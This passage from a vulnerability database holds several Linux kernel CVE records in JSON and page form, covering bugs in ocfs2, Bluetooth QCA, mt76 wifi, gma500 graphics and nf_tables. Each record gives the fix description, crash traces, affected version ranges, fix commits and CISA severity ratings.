"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nocfs2: fix DIO failure due to insufficient transaction credits\n\nThe code in ocfs2_dio_end_io_write() estimates number of necessary\ntransaction credits using ocfs2_calc_extend_credits(). This however does\nnot take into account that the IO could be arbitrarily large and can\ncontain arbitrary number of extents.\n\nExtent tree manipulations do often extend the current transaction but not\nin all of the cases. For example if we have only single block extents in\nthe tree, ocfs2_mark_extent_written() will end up calling\nocfs2_replace_extent_rec() all the time and we will never extend the\ncurrent transaction and eventually exhaust all the transaction credits if\nthe IO contains many single block extents. Once that happens a\nWARN_ON(jbd2_handle_buffer_credits(handle) \u003c= 0) is triggered in\njbd2_journal_dirty_metadata() and subsequently OCFS2 aborts in response to\nthis error. This was actually triggered by one of our customers on a\nheavily fragmented OCFS2 filesystem.\n\nTo fix the issue make sure the transaction always has enough credits for\none extent insert before each call of ocfs2_mark_extent_written().\n\nHeming Zhao said:\n\n------\nPANIC: \"Kernel panic - not syncing: OCFS2: (device dm-1): panic forced after error\"\n\nPID: xxx TASK: xxxx CPU: 5 COMMAND: \"SubmitThread-CA\"\n #0 machine_kexec at ffffffff8c069932\n #1 __crash_kexec at ffffffff8c1338fa\n #2 panic at ffffffff8c1d69b9\n #3 ocfs2_handle_error at ffffffffc0c86c0c [ocfs2]\n #4 __ocfs2_abort at ffffffffc0c88387 [ocfs2]\n #5 ocfs2_journal_dirty at ffffffffc0c51e98 [ocfs2]\n #6 ocfs2_split_extent at ffffffffc0c27ea3 [ocfs2]\n #7 ocfs2_change_extent_flag at ffffffffc0c28053 [ocfs2]\n #8 ocfs2_mark_extent_written at ffffffffc0c28347 [ocfs2]\n #9 ocfs2_dio_end_io_write at ffffffffc0c2bef9 [ocfs2]\n#10 ocfs2_dio_end_io at ffffffffc0c2c0f5 [ocfs2]\n#11 dio_complete at ffffffff8c2b9fa7\n#12 do_blockdev_direct_IO at ffffffff8c2bc09f\n#13 ocfs2_direct_IO at ffffffffc0c2b653 [ocfs2]\n#14 generic_file_direct_write at ffffffff8c1dcf14\n#15 __generic_file_write_iter at ffffffff8c1dd07b\n#16 ocfs2_file_write_iter at ffffffffc0c49f1f [ocfs2]\n#17 aio_write at ffffffff8c2cc72e\n#18 kmem_cache_alloc at ffffffff8c248dde\n#19 do_io_submit at ffffffff8c2ccada\n#20 do_syscall_64 at ffffffff8c004984\n#21 entry_SYSCALL_64_after_hwframe at ffffffff8c8000ba"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:22:28.417Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/a68b896aa56e435506453ec8835bc991ec3ae687"
},
{
"url": "https://git.kernel.org/stable/c/320273b5649bbcee87f9e65343077189699d2a7a"
},
{
"url": "https://git.kernel.org/stable/c/9ea2d1c6789722d58ec191f14f9a02518d55b6b4"
},
{
"url": "https://git.kernel.org/stable/c/c05ffb693bfb42a48ef3ee88a55b57392984e111"
},
{
"url": "https://git.kernel.org/stable/c/331d1079d58206ff7dc5518185f800b412f89bc6"
},
{
"url": "https://git.kernel.org/stable/c/be346c1a6eeb49d8fda827d2a9522124c2f72f36"
}
],
"title": "ocfs2: fix DIO failure due to insufficient transaction credits",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42077",
"datePublished": "2024-07-29T15:52:39.661Z",
"dateReserved": "2024-07-29T15:50:41.169Z",
"dateUpdated": "2025-05-04T09:22:28.417Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42137 (GCVE-0-2024-42137)
Vulnerability from cvelistv5
Published
2024-07-30 07:46
Modified
2025-05-04 09:23
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: qca: Fix BT enable failure again for QCA6390 after warm reboot
Commit 272970be3dab ("Bluetooth: hci_qca: Fix driver shutdown on closed
serdev") will cause below regression issue:
BT can't be enabled after below steps:
cold boot -> enable BT -> disable BT -> warm reboot -> BT enable failure
if property enable-gpios is not configured within DT|ACPI for QCA6390.
The commit is to fix a use-after-free issue within qca_serdev_shutdown()
by adding condition to avoid the serdev is flushed or wrote after closed
but also introduces this regression issue regarding above steps since the
VSC is not sent to reset controller during warm reboot.
Fixed by sending the VSC to reset controller within qca_serdev_shutdown()
once BT was ever enabled, and the use-after-free issue is also fixed by
this change since the serdev is still opened before it is flushed or wrote.
Verified by the reported machine Dell XPS 13 9310 laptop over below two
kernel commits:
commit e00fc2700a3f ("Bluetooth: btusb: Fix triggering coredump
implementation for QCA") of bluetooth-next tree.
commit b23d98d46d28 ("Bluetooth: btusb: Fix triggering coredump
implementation for QCA") of linus mainline tree.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: e84ec6e25df9bb0968599e92eacedaf3a0a5b587 Version: 908d1742b6e694e84ead5c62e4b7c1bfbb8b46a3 Version: ea3ebda47dd56f6e1c62f2e0e1b6e1b0a973e447 Version: 272970be3dabd24cbe50e393ffee8f04aec3b9a8 Version: 272970be3dabd24cbe50e393ffee8f04aec3b9a8 Version: 272970be3dabd24cbe50e393ffee8f04aec3b9a8 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:54:32.549Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/215a26c2404fa34625c725d446967fa328a703eb"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4ca6013cd18e58ac1044908c40d4006a92093a11"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e6e200b264271f62a3fadb51ada9423015ece37b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e2d8aa4c763593704ac21e7591aed4f13e32f3b5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/977b9dc65e14fb80de4763d949c7dec2ecb15b9b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/88e72239ead9814b886db54fc4ee39ef3c2b8f26"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42137",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:16:06.425192Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:35.827Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/bluetooth/hci_qca.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "215a26c2404fa34625c725d446967fa328a703eb",
"status": "affected",
"version": "e84ec6e25df9bb0968599e92eacedaf3a0a5b587",
"versionType": "git"
},
{
"lessThan": "4ca6013cd18e58ac1044908c40d4006a92093a11",
"status": "affected",
"version": "908d1742b6e694e84ead5c62e4b7c1bfbb8b46a3",
"versionType": "git"
},
{
"lessThan": "e6e200b264271f62a3fadb51ada9423015ece37b",
"status": "affected",
"version": "ea3ebda47dd56f6e1c62f2e0e1b6e1b0a973e447",
"versionType": "git"
},
{
"lessThan": "e2d8aa4c763593704ac21e7591aed4f13e32f3b5",
"status": "affected",
"version": "272970be3dabd24cbe50e393ffee8f04aec3b9a8",
"versionType": "git"
},
{
"lessThan": "977b9dc65e14fb80de4763d949c7dec2ecb15b9b",
"status": "affected",
"version": "272970be3dabd24cbe50e393ffee8f04aec3b9a8",
"versionType": "git"
},
{
"lessThan": "88e72239ead9814b886db54fc4ee39ef3c2b8f26",
"status": "affected",
"version": "272970be3dabd24cbe50e393ffee8f04aec3b9a8",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/bluetooth/hci_qca.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.2"
},
{
"lessThan": "6.2",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.222",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.163",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.98",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.39",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.9",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.222",
"versionStartIncluding": "5.10.165",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.163",
"versionStartIncluding": "5.15.90",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.98",
"versionStartIncluding": "6.1.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.39",
"versionStartIncluding": "6.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.9",
"versionStartIncluding": "6.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "6.2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: qca: Fix BT enable failure again for QCA6390 after warm reboot\n\nCommit 272970be3dab (\"Bluetooth: hci_qca: Fix driver shutdown on closed\nserdev\") will cause below regression issue:\n\nBT can\u0027t be enabled after below steps:\ncold boot -\u003e enable BT -\u003e disable BT -\u003e warm reboot -\u003e BT enable failure\nif property enable-gpios is not configured within DT|ACPI for QCA6390.\n\nThe commit is to fix a use-after-free issue within qca_serdev_shutdown()\nby adding condition to avoid the serdev is flushed or wrote after closed\nbut also introduces this regression issue regarding above steps since the\nVSC is not sent to reset controller during warm reboot.\n\nFixed by sending the VSC to reset controller within qca_serdev_shutdown()\nonce BT was ever enabled, and the use-after-free issue is also fixed by\nthis change since the serdev is still opened before it is flushed or wrote.\n\nVerified by the reported machine Dell XPS 13 9310 laptop over below two\nkernel commits:\ncommit e00fc2700a3f (\"Bluetooth: btusb: Fix triggering coredump\nimplementation for QCA\") of bluetooth-next tree.\ncommit b23d98d46d28 (\"Bluetooth: btusb: Fix triggering coredump\nimplementation for QCA\") of linus mainline tree."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:23:54.718Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/215a26c2404fa34625c725d446967fa328a703eb"
},
{
"url": "https://git.kernel.org/stable/c/4ca6013cd18e58ac1044908c40d4006a92093a11"
},
{
"url": "https://git.kernel.org/stable/c/e6e200b264271f62a3fadb51ada9423015ece37b"
},
{
"url": "https://git.kernel.org/stable/c/e2d8aa4c763593704ac21e7591aed4f13e32f3b5"
},
{
"url": "https://git.kernel.org/stable/c/977b9dc65e14fb80de4763d949c7dec2ecb15b9b"
},
{
"url": "https://git.kernel.org/stable/c/88e72239ead9814b886db54fc4ee39ef3c2b8f26"
}
],
"title": "Bluetooth: qca: Fix BT enable failure again for QCA6390 after warm reboot",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42137",
"datePublished": "2024-07-30T07:46:31.748Z",
"dateReserved": "2024-07-29T15:50:41.188Z",
"dateUpdated": "2025-05-04T09:23:54.718Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42225 (GCVE-0-2024-42225)
Vulnerability from cvelistv5
Published
2024-07-30 07:47
Modified
2025-05-04 09:24
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: replace skb_put with skb_put_zero
Avoid potentially reusing uninitialized data
References
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
Impacted products
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:54:32.565Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/dc7f14d00d0c4c21898f3504607f4a31079065a2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/22ea2a7f0b64d323625950414a4496520fb33657"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ff6b26be13032c5fbd6b6a0b24358f8eaac4f3af"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/64f86337ccfe77fe3be5a9356b0dabde23fbb074"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7f819a2f4fbc510e088b49c79addcf1734503578"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42225",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:14:38.019669Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:33.317Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/wireless/mediatek/mt76/mt76_connac_mcu.c",
"drivers/net/wireless/mediatek/mt76/mt7915/mcu.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "dc7f14d00d0c4c21898f3504607f4a31079065a2",
"status": "affected",
"version": "7bc04215a66b60e198aecaee8418f6d79fa19faa",
"versionType": "git"
},
{
"lessThan": "22ea2a7f0b64d323625950414a4496520fb33657",
"status": "affected",
"version": "7bc04215a66b60e198aecaee8418f6d79fa19faa",
"versionType": "git"
},
{
"lessThan": "ff6b26be13032c5fbd6b6a0b24358f8eaac4f3af",
"status": "affected",
"version": "7bc04215a66b60e198aecaee8418f6d79fa19faa",
"versionType": "git"
},
{
"lessThan": "64f86337ccfe77fe3be5a9356b0dabde23fbb074",
"status": "affected",
"version": "7bc04215a66b60e198aecaee8418f6d79fa19faa",
"versionType": "git"
},
{
"lessThan": "7f819a2f4fbc510e088b49c79addcf1734503578",
"status": "affected",
"version": "7bc04215a66b60e198aecaee8418f6d79fa19faa",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/wireless/mediatek/mt76/mt76_connac_mcu.c",
"drivers/net/wireless/mediatek/mt76/mt7915/mcu.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.16"
},
{
"lessThan": "4.16",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.163",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.98",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.39",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.9",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.163",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.98",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.39",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.9",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "4.16",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: mt76: replace skb_put with skb_put_zero\n\nAvoid potentially reusing uninitialized data"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:24:33.024Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/dc7f14d00d0c4c21898f3504607f4a31079065a2"
},
{
"url": "https://git.kernel.org/stable/c/22ea2a7f0b64d323625950414a4496520fb33657"
},
{
"url": "https://git.kernel.org/stable/c/ff6b26be13032c5fbd6b6a0b24358f8eaac4f3af"
},
{
"url": "https://git.kernel.org/stable/c/64f86337ccfe77fe3be5a9356b0dabde23fbb074"
},
{
"url": "https://git.kernel.org/stable/c/7f819a2f4fbc510e088b49c79addcf1734503578"
}
],
"title": "wifi: mt76: replace skb_put with skb_put_zero",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42225",
"datePublished": "2024-07-30T07:47:06.397Z",
"dateReserved": "2024-07-30T07:40:12.250Z",
"dateUpdated": "2025-05-04T09:24:33.024Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42309 (GCVE-0-2024-42309)
Vulnerability from cvelistv5
Published
2024-08-17 09:09
Modified
2025-05-04 09:26
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
drm/gma500: fix null pointer dereference in psb_intel_lvds_get_modes
In psb_intel_lvds_get_modes(), the return value of drm_mode_duplicate() is
assigned to mode, which will lead to a possible NULL pointer dereference
on failure of drm_mode_duplicate(). Add a check to avoid npd.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 89c78134cc54dff016c83367912eb055637fa50c Version: 89c78134cc54dff016c83367912eb055637fa50c Version: 89c78134cc54dff016c83367912eb055637fa50c Version: 89c78134cc54dff016c83367912eb055637fa50c Version: 89c78134cc54dff016c83367912eb055637fa50c Version: 89c78134cc54dff016c83367912eb055637fa50c Version: 89c78134cc54dff016c83367912eb055637fa50c Version: 89c78134cc54dff016c83367912eb055637fa50c |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42309",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:10:05.824030Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:27.439Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/gma500/psb_intel_lvds.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "13b5f3ee94bdbdc4b5f40582aab62977905aedee",
"status": "affected",
"version": "89c78134cc54dff016c83367912eb055637fa50c",
"versionType": "git"
},
{
"lessThan": "d6ad202f73f8edba0cbc0065aa57a79ffe8fdcdc",
"status": "affected",
"version": "89c78134cc54dff016c83367912eb055637fa50c",
"versionType": "git"
},
{
"lessThan": "6735d02ead7dd3adf74eb8b70aebd09e0ce78ec9",
"status": "affected",
"version": "89c78134cc54dff016c83367912eb055637fa50c",
"versionType": "git"
},
{
"lessThan": "7e52c62ff029f95005915c0a11863b5fb5185c8c",
"status": "affected",
"version": "89c78134cc54dff016c83367912eb055637fa50c",
"versionType": "git"
},
{
"lessThan": "f70ffeca546452d1acd3a70ada56ecb2f3e7f811",
"status": "affected",
"version": "89c78134cc54dff016c83367912eb055637fa50c",
"versionType": "git"
},
{
"lessThan": "46d2ef272957879cbe30a884574320e7f7d78692",
"status": "affected",
"version": "89c78134cc54dff016c83367912eb055637fa50c",
"versionType": "git"
},
{
"lessThan": "475a5b3b7c8edf6e583a9eb59cf28ea770602e14",
"status": "affected",
"version": "89c78134cc54dff016c83367912eb055637fa50c",
"versionType": "git"
},
{
"lessThan": "2df7aac81070987b0f052985856aa325a38debf6",
"status": "affected",
"version": "89c78134cc54dff016c83367912eb055637fa50c",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/gma500/psb_intel_lvds.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.3"
},
{
"lessThan": "3.3",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.320",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.282",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.224",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.103",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.44",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.320",
"versionStartIncluding": "3.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.282",
"versionStartIncluding": "3.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.224",
"versionStartIncluding": "3.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.165",
"versionStartIncluding": "3.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.103",
"versionStartIncluding": "3.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.44",
"versionStartIncluding": "3.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.3",
"versionStartIncluding": "3.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "3.3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/gma500: fix null pointer dereference in psb_intel_lvds_get_modes\n\nIn psb_intel_lvds_get_modes(), the return value of drm_mode_duplicate() is\nassigned to mode, which will lead to a possible NULL pointer dereference\non failure of drm_mode_duplicate(). Add a check to avoid npd."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:26:27.984Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/13b5f3ee94bdbdc4b5f40582aab62977905aedee"
},
{
"url": "https://git.kernel.org/stable/c/d6ad202f73f8edba0cbc0065aa57a79ffe8fdcdc"
},
{
"url": "https://git.kernel.org/stable/c/6735d02ead7dd3adf74eb8b70aebd09e0ce78ec9"
},
{
"url": "https://git.kernel.org/stable/c/7e52c62ff029f95005915c0a11863b5fb5185c8c"
},
{
"url": "https://git.kernel.org/stable/c/f70ffeca546452d1acd3a70ada56ecb2f3e7f811"
},
{
"url": "https://git.kernel.org/stable/c/46d2ef272957879cbe30a884574320e7f7d78692"
},
{
"url": "https://git.kernel.org/stable/c/475a5b3b7c8edf6e583a9eb59cf28ea770602e14"
},
{
"url": "https://git.kernel.org/stable/c/2df7aac81070987b0f052985856aa325a38debf6"
}
],
"title": "drm/gma500: fix null pointer dereference in psb_intel_lvds_get_modes",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42309",
"datePublished": "2024-08-17T09:09:14.164Z",
"dateReserved": "2024-07-30T07:40:12.276Z",
"dateUpdated": "2025-05-04T09:26:27.984Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-47106 (GCVE-0-2021-47106)
Vulnerability from cvelistv5
Published
2024-03-04 18:15
Modified
2025-05-04 07:04
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
netfilter: nf_tables: fix use-after-free in nft_set_catchall_destroy()
We need to use list_for_each_entry_safe() iterator
because we can not access @catchall after kfree_rcu() call.
syzbot reported:
BUG: KASAN: use-after-free in nft_set_catchall_destroy net/netfilter/nf_tables_api.c:4486 [inline]
BUG: KASAN: use-after-free in nft_set_destroy net/netfilter/nf_tables_api.c:4504 [inline]
BUG: KASAN: use-after-free in nft_set_destroy+0x3fd/0x4f0 net/netfilter/nf_tables_api.c:4493
Read of size 8 at addr ffff8880716e5b80 by task syz-executor.3/8871
CPU: 1 PID: 8871 Comm: syz-executor.3 Not tainted 5.16.0-rc5-syzkaller #0
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 01/01/2011
Call Trace:
<TASK>
__dump_stack lib/dump_stack.c:88 [inline]
dump_stack_lvl+0xcd/0x134 lib/dump_stack.c:106
print_address_description.constprop.0.cold+0x8d/0x2ed mm/kasan/report.c:247
__kasan_report mm/kasan/report.c:433 [inline]
kasan_report.cold+0x83/0xdf mm/kasan/report.c:450
nft_set_catchall_destroy net/netfilter/nf_tables_api.c:4486 [inline]
nft_set_destroy net/netfilter/nf_tables_api.c:4504 [inline]
nft_set_destroy+0x3fd/0x4f0 net/netfilter/nf_tables_api.c:4493
__nft_release_table+0x79f/0xcd0 net/netfilter/nf_tables_api.c:9626
nft_rcv_nl_event+0x4f8/0x670 net/netfilter/nf_tables_api.c:9688
notifier_call_chain+0xb5/0x200 kernel/notifier.c:83
blocking_notifier_call_chain kernel/notifier.c:318 [inline]
blocking_notifier_call_chain+0x67/0x90 kernel/notifier.c:306
netlink_release+0xcb6/0x1dd0 net/netlink/af_netlink.c:788
__sock_release+0xcd/0x280 net/socket.c:649
sock_close+0x18/0x20 net/socket.c:1314
__fput+0x286/0x9f0 fs/file_table.c:280
